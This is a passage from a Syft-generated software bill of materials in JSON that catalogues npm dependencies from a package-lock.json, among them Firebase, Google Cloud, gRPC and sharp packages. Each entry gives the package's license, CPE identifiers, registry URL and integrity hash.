/app-check-interop:\\@firebase\\/app-check-interop-types:0.3.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@firebase\\/app-check-interop:\\@firebase\\/app_check_interop_types:0.3.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@firebase\\/app_check_interop:\\@firebase\\/app-check-interop-types:0.3.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@firebase\\/app_check_interop:\\@firebase\\/app_check_interop_types:0.3.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@firebase\\/app-check:\\@firebase\\/app-check-interop-types:0.3.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@firebase\\/app-check:\\@firebase\\/app_check_interop_types:0.3.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@firebase\\/app_check:\\@firebase\\/app-check-interop-types:0.3.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@firebase\\/app_check:\\@firebase\\/app_check_interop_types:0.3.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@firebase\\/app:\\@firebase\\/app-check-interop-types:0.3.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@firebase\\/app:\\@firebase\\/app_check_interop_types:0.3.2:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40firebase/app-check-interop-types@0.3.2","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@firebase/app-check-interop-types/-/app-check-interop-types-0.3.2.tgz","integrity":"sha512-LMs47Vinv2HBMZi49C09dJxp0QT5LwDzFaVGf/+ITHe3BlIhUiLNttkATSXplc89A2lAaeTqjgqVkiRfUGyQiQ==","dependencies":null}},{"id":"a5bfafbacd41f0a2","name":"@firebase/app-types","version":"0.9.2","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"Apache-2.0","spdxExpression":"Apache-2.0","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@firebase\\/app-types:\\@firebase\\/app-types:0.9.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@firebase\\/app-types:\\@firebase\\/app_types:0.9.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@firebase\\/app_types:\\@firebase\\/app-types:0.9.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@firebase\\/app_types:\\@firebase\\/app_types:0.9.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@firebase\\/app:\\@firebase\\/app-types:0.9.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@firebase\\/app:\\@firebase\\/app_types:0.9.2:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40firebase/app-types@0.9.2","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@firebase/app-types/-/app-types-0.9.2.tgz","integrity":"sha512-oMEZ1TDlBz479lmABwWsWjzHwheQKiAgnuKxE0pz0IXCVx7/rtlkx1fQ6GfgK24WCrxDKMplZrT50Kh04iMbXQ==","dependencies":null}},{"id":"9b3141b15843b5a9","name":"@firebase/auth-interop-types","version":"0.2.3","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"Apache-2.0","spdxExpression":"Apache-2.0","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@firebase\\/auth-interop-types:\\@firebase\\/auth-interop-types:0.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@firebase\\/auth-interop-types:\\@firebase\\/auth_interop_types:0.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@firebase\\/auth_interop_types:\\@firebase\\/auth-interop-types:0.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@firebase\\/auth_interop_types:\\@firebase\\/auth_interop_types:0.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@firebase\\/auth-interop:\\@firebase\\/auth-interop-types:0.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@firebase\\/auth-interop:\\@firebase\\/auth_interop_types:0.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@firebase\\/auth_interop:\\@firebase\\/auth-interop-types:0.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@firebase\\/auth_interop:\\@firebase\\/auth_interop_types:0.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@firebase\\/auth:\\@firebase\\/auth-interop-types:0.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@firebase\\/auth:\\@firebase\\/auth_interop_types:0.2.3:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40firebase/auth-interop-types@0.2.3","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@firebase/auth-interop-types/-/auth-interop-types-0.2.3.tgz","integrity":"sha512-Fc9wuJGgxoxQeavybiuwgyi+0rssr76b+nHpj+eGhXFYAdudMWyfBHvFL/I5fEHniUM/UQdFzi9VXJK2iZF7FQ==","dependencies":null}},{"id":"23f944b79804e251","name":"@firebase/component","version":"0.6.9","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"Apache-2.0","spdxExpression":"Apache-2.0","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@firebase\\/component:\\@firebase\\/component:0.6.9:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40firebase/component@0.6.9","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@firebase/component/-/component-0.6.9.tgz","integrity":"sha512-gm8EUEJE/fEac86AvHn8Z/QW8BvR56TBw3hMW0O838J/1mThYQXAIQBgUv75EqlCZfdawpWLrKt1uXvp9ciK3Q==","dependencies":{"@firebase/util":"1.10.0","tslib":"^2.1.0"}}},{"id":"49e5593cb4d5046f","name":"@firebase/database","version":"1.0.8","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"Apache-2.0","spdxExpression":"Apache-2.0","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@firebase\\/database:\\@firebase\\/database:1.0.8:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40firebase/database@1.0.8","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@firebase/database/-/database-1.0.8.tgz","integrity":"sha512-dzXALZeBI1U5TXt6619cv0+tgEhJiwlUtQ55WNZY7vGAjv7Q1QioV969iYwt1AQQ0ovHnEW0YW9TiBfefLvErg==","dependencies":{"@firebase/app-check-interop-types":"0.3.2","@firebase/auth-interop-types":"0.2.3","@firebase/component":"0.6.9","@firebase/logger":"0.4.2","@firebase/util":"1.10.0","faye-websocket":"0.11.4","tslib":"^2.1.0"}}},{"id":"2a2bae4730b1aafc","name":"@firebase/database-compat","version":"1.0.8","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"Apache-2.0","spdxExpression":"Apache-2.0","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@firebase\\/database-compat:\\@firebase\\/database-compat:1.0.8:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@firebase\\/database-compat:\\@firebase\\/database_compat:1.0.8:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@firebase\\/database_compat:\\@firebase\\/database-compat:1.0.8:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@firebase\\/database_compat:\\@firebase\\/database_compat:1.0.8:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@firebase\\/database:\\@firebase\\/database-compat:1.0.8:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@firebase\\/database:\\@firebase\\/database_compat:1.0.8:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40firebase/database-compat@1.0.8","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@firebase/database-compat/-/database-compat-1.0.8.tgz","integrity":"sha512-OpeWZoPE3sGIRPBKYnW9wLad25RaWbGyk7fFQe4xnJQKRzlynWeFBSRRAoLE2Old01WXwskUiucNqUUVlFsceg==","dependencies":{"@firebase/component":"0.6.9","@firebase/database":"1.0.8","@firebase/database-types":"1.0.5","@firebase/logger":"0.4.2","@firebase/util":"1.10.0","tslib":"^2.1.0"}}},{"id":"67e400eb3f7a92f4","name":"@firebase/database-types","version":"1.0.5","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"Apache-2.0","spdxExpression":"Apache-2.0","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@firebase\\/database-types:\\@firebase\\/database-types:1.0.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@firebase\\/database-types:\\@firebase\\/database_types:1.0.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@firebase\\/database_types:\\@firebase\\/database-types:1.0.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@firebase\\/database_types:\\@firebase\\/database_types:1.0.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@firebase\\/database:\\@firebase\\/database-types:1.0.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@firebase\\/database:\\@firebase\\/database_types:1.0.5:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40firebase/database-types@1.0.5","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@firebase/database-types/-/database-types-1.0.5.tgz","integrity":"sha512-fTlqCNwFYyq/C6W7AJ5OCuq5CeZuBEsEwptnVxlNPkWCo5cTTyukzAHRSO/jaQcItz33FfYrrFk1SJofcu2AaQ==","dependencies":{"@firebase/app-types":"0.9.2","@firebase/util":"1.10.0"}}},{"id":"fdb02e46c7ca0cd4","name":"@firebase/logger","version":"0.4.2","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"Apache-2.0","spdxExpression":"Apache-2.0","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@firebase\\/logger:\\@firebase\\/logger:0.4.2:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40firebase/logger@0.4.2","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@firebase/logger/-/logger-0.4.2.tgz","integrity":"sha512-Q1VuA5M1Gjqrwom6I6NUU4lQXdo9IAQieXlujeHZWvRt1b7qQ0KwBaNAjgxG27jgF9/mUwsNmO8ptBCGVYhB0A==","dependencies":{"tslib":"^2.1.0"}}},{"id":"6fc2f98e01b8bb45","name":"@firebase/util","version":"1.10.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"Apache-2.0","spdxExpression":"Apache-2.0","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:google:firebase\\/util:1.10.0:*:*:*:*:node.js:*:*","source":"nvd-cpe-dictionary"}],"purl":"pkg:npm/%40firebase/util@1.10.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@firebase/util/-/util-1.10.0.tgz","integrity":"sha512-xKtx4A668icQqoANRxyDLBLz51TAbDP9KRfpbKGxiCAW346d0BeJe5vN6/hKxxmWwnZ0mautyv39JxviwwQMOQ==","dependencies":{"tslib":"^2.1.0"}}},{"id":"352073d173d9984f","name":"@google-cloud/firestore","version":"7.11.6","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"Apache-2.0","spdxExpression":"Apache-2.0","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:google:cloud_firestore:7.11.6:*:*:*:*:node.js:*:*","source":"nvd-cpe-dictionary"}],"purl":"pkg:npm/%40google-cloud/firestore@7.11.6","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@google-cloud/firestore/-/firestore-7.11.6.tgz","integrity":"sha512-EW/O8ktzwLfyWBOsNuhRoMi8lrC3clHM5LVFhGvO1HCsLozCOOXRAlHrYBoE6HL42Sc8yYMuCb2XqcnJ4OOEpw==","dependencies":{"@opentelemetry/api":"^1.3.0","fast-deep-equal":"^3.1.1","functional-red-black-tree":"^1.0.1","google-gax":"^4.3.3","protobufjs":"^7.2.6"}}},{"id":"e1f90862acd15bdd","name":"@google-cloud/paginator","version":"5.0.2","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"Apache-2.0","spdxExpression":"Apache-2.0","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@google-cloud\\/paginator:\\@google-cloud\\/paginator:5.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@google-cloud\\/paginator:\\@google_cloud\\/paginator:5.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@google_cloud\\/paginator:\\@google-cloud\\/paginator:5.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@google_cloud\\/paginator:\\@google_cloud\\/paginator:5.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@google:\\@google-cloud\\/paginator:5.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@google:\\@google_cloud\\/paginator:5.0.2:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40google-cloud/paginator@5.0.2","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@google-cloud/paginator/-/paginator-5.0.2.tgz","integrity":"sha512-DJS3s0OVH4zFDB1PzjxAsHqJT6sKVbRwwML0ZBP9PbU7Yebtu/7SWMRzvO2J3nUi9pRNITCfu4LJeooM2w4pjg==","dependencies":{"arrify":"^2.0.0","extend":"^3.0.2"}}},{"id":"aae37aa20c3046f6","name":"@google-cloud/projectify","version":"4.0.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"Apache-2.0","spdxExpression":"Apache-2.0","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@google-cloud\\/projectify:\\@google-cloud\\/projectify:4.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@google-cloud\\/projectify:\\@google_cloud\\/projectify:4.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@google_cloud\\/projectify:\\@google-cloud\\/projectify:4.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@google_cloud\\/projectify:\\@google_cloud\\/projectify:4.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@google:\\@google-cloud\\/projectify:4.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@google:\\@google_cloud\\/projectify:4.0.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40google-cloud/projectify@4.0.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@google-cloud/projectify/-/projectify-4.0.0.tgz","integrity":"sha512-MmaX6HeSvyPbWGwFq7mXdo0uQZLGBYCwziiLIGq5JVX+/bdI3SAq6bP98trV5eTWfLuvsMcIC1YJOF2vfteLFA==","dependencies":null}},{"id":"3927becf19e34873","name":"@google-cloud/promisify","version":"4.0.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"Apache-2.0","spdxExpression":"Apache-2.0","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@google-cloud\\/promisify:\\@google-cloud\\/promisify:4.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@google-cloud\\/promisify:\\@google_cloud\\/promisify:4.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@google_cloud\\/promisify:\\@google-cloud\\/promisify:4.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@google_cloud\\/promisify:\\@google_cloud\\/promisify:4.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@google:\\@google-cloud\\/promisify:4.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@google:\\@google_cloud\\/promisify:4.0.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40google-cloud/promisify@4.0.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@google-cloud/promisify/-/promisify-4.0.0.tgz","integrity":"sha512-Orxzlfb9c67A15cq2JQEyVc7wEsmFBmHjZWZYQMUyJ1qivXyMwdyNOs9odi79hze+2zqdTtu1E19IM/FtqZ10g==","dependencies":null}},{"id":"cefeafe40657f94b","name":"@google-cloud/storage","version":"7.19.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"Apache-2.0","spdxExpression":"Apache-2.0","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@google-cloud\\/storage:\\@google-cloud\\/storage:7.19.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@google-cloud\\/storage:\\@google_cloud\\/storage:7.19.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@google_cloud\\/storage:\\@google-cloud\\/storage:7.19.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@google_cloud\\/storage:\\@google_cloud\\/storage:7.19.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@google:\\@google-cloud\\/storage:7.19.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@google:\\@google_cloud\\/storage:7.19.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40google-cloud/storage@7.19.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@google-cloud/storage/-/storage-7.19.0.tgz","integrity":"sha512-n2FjE7NAOYyshogdc7KQOl/VZb4sneqPjWouSyia9CMDdMhRX5+RIbqalNmC7LOLzuLAN89VlF2HvG8na9G+zQ==","dependencies":{"@google-cloud/paginator":"^5.0.0","@google-cloud/projectify":"^4.0.0","@google-cloud/promisify":"<4.1.0","abort-controller":"^3.0.0","async-retry":"^1.3.3","duplexify":"^4.1.3","fast-xml-parser":"^5.3.4","gaxios":"^6.0.2","google-auth-library":"^9.6.3","html-entities":"^2.5.2","mime":"^3.0.0","p-limit":"^3.0.1","retry-request":"^7.0.0","teeny-request":"^9.0.0","uuid":"^8.0.0"}}},{"id":"3f87a56430ddd85e","name":"@grpc/grpc-js","version":"1.14.3","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"Apache-2.0","spdxExpression":"Apache-2.0","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:grpc:grpc:1.14.3:*:*:*:*:node.js:*:*","source":"nvd-cpe-dictionary"}],"purl":"pkg:npm/%40grpc/grpc-js@1.14.3","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@grpc/grpc-js/-/grpc-js-1.14.3.tgz","integrity":"sha512-Iq8QQQ/7X3Sac15oB6p0FmUg/klxQvXLeileoqrTRGJYLV+/9tubbr9ipz0GKHjmXVsgFPo/+W+2cA8eNcR+XA==","dependencies":{"@grpc/proto-loader":"^0.8.0","@js-sdsl/ordered-map":"^4.4.2"}}},{"id":"05aac3d8e010493a","name":"@grpc/proto-loader","version":"0.7.15","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"Apache-2.0","spdxExpression":"Apache-2.0","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@grpc\\/proto-loader:\\@grpc\\/proto-loader:0.7.15:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@grpc\\/proto-loader:\\@grpc\\/proto_loader:0.7.15:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@grpc\\/proto_loader:\\@grpc\\/proto-loader:0.7.15:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@grpc\\/proto_loader:\\@grpc\\/proto_loader:0.7.15:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@grpc\\/proto:\\@grpc\\/proto-loader:0.7.15:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@grpc\\/proto:\\@grpc\\/proto_loader:0.7.15:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40grpc/proto-loader@0.7.15","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@grpc/proto-loader/-/proto-loader-0.7.15.tgz","integrity":"sha512-tMXdRCfYVixjuFK+Hk0Q1s38gV9zDiDJfWL3h1rv4Qc39oILCu1TRTDt7+fGUI8K4G1Fj125Hx/ru3azECWTyQ==","dependencies":{"lodash.camelcase":"^4.3.0","long":"^5.0.0","protobufjs":"^7.2.5","yargs":"^17.7.2"}}},{"id":"1a954d92edb2b14f","name":"@grpc/proto-loader","version":"0.8.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"Apache-2.0","spdxExpression":"Apache-2.0","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@grpc\\/proto-loader:\\@grpc\\/proto-loader:0.8.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@grpc\\/proto-loader:\\@grpc\\/proto_loader:0.8.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@grpc\\/proto_loader:\\@grpc\\/proto-loader:0.8.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@grpc\\/proto_loader:\\@grpc\\/proto_loader:0.8.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@grpc\\/proto:\\@grpc\\/proto-loader:0.8.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@grpc\\/proto:\\@grpc\\/proto_loader:0.8.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40grpc/proto-loader@0.8.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@grpc/proto-loader/-/proto-loader-0.8.0.tgz","integrity":"sha512-rc1hOQtjIWGxcxpb9aHAfLpIctjEnsDehj0DAiVfBlmT84uvR0uUtN2hEi/ecvWVjXUGf5qPF4qEgiLOx1YIMQ==","dependencies":{"lodash.camelcase":"^4.3.0","long":"^5.0.0","protobufjs":"^7.5.3","yargs":"^17.7.2"}}},{"id":"0b879a880de07100","name":"@img/colour","version":"1.1.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@img\\/colour:\\@img\\/colour:1.1.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40img/colour@1.1.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@img/colour/-/colour-1.1.0.tgz","integrity":"sha512-Td76q7j57o/tLVdgS746cYARfSyxk8iEfRxewL9h4OMzYhbW4TAcppl0mT4eyqXddh6L/jwoM75mo7ixa/pCeQ==","dependencies":null}},{"id":"535aeb1bbda7aba8","name":"@img/sharp-darwin-arm64","version":"0.34.5","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"Apache-2.0","spdxExpression":"Apache-2.0","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@img\\/sharp-darwin-arm64:\\@img\\/sharp-darwin-arm64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-darwin-arm64:\\@img\\/sharp_darwin_arm64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_darwin_arm64:\\@img\\/sharp-darwin-arm64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_darwin_arm64:\\@img\\/sharp_darwin_arm64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-darwin:\\@img\\/sharp-darwin-arm64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-darwin:\\@img\\/sharp_darwin_arm64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_darwin:\\@img\\/sharp-darwin-arm64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_darwin:\\@img\\/sharp_darwin_arm64:0.34.5:*:*:*:*:*:*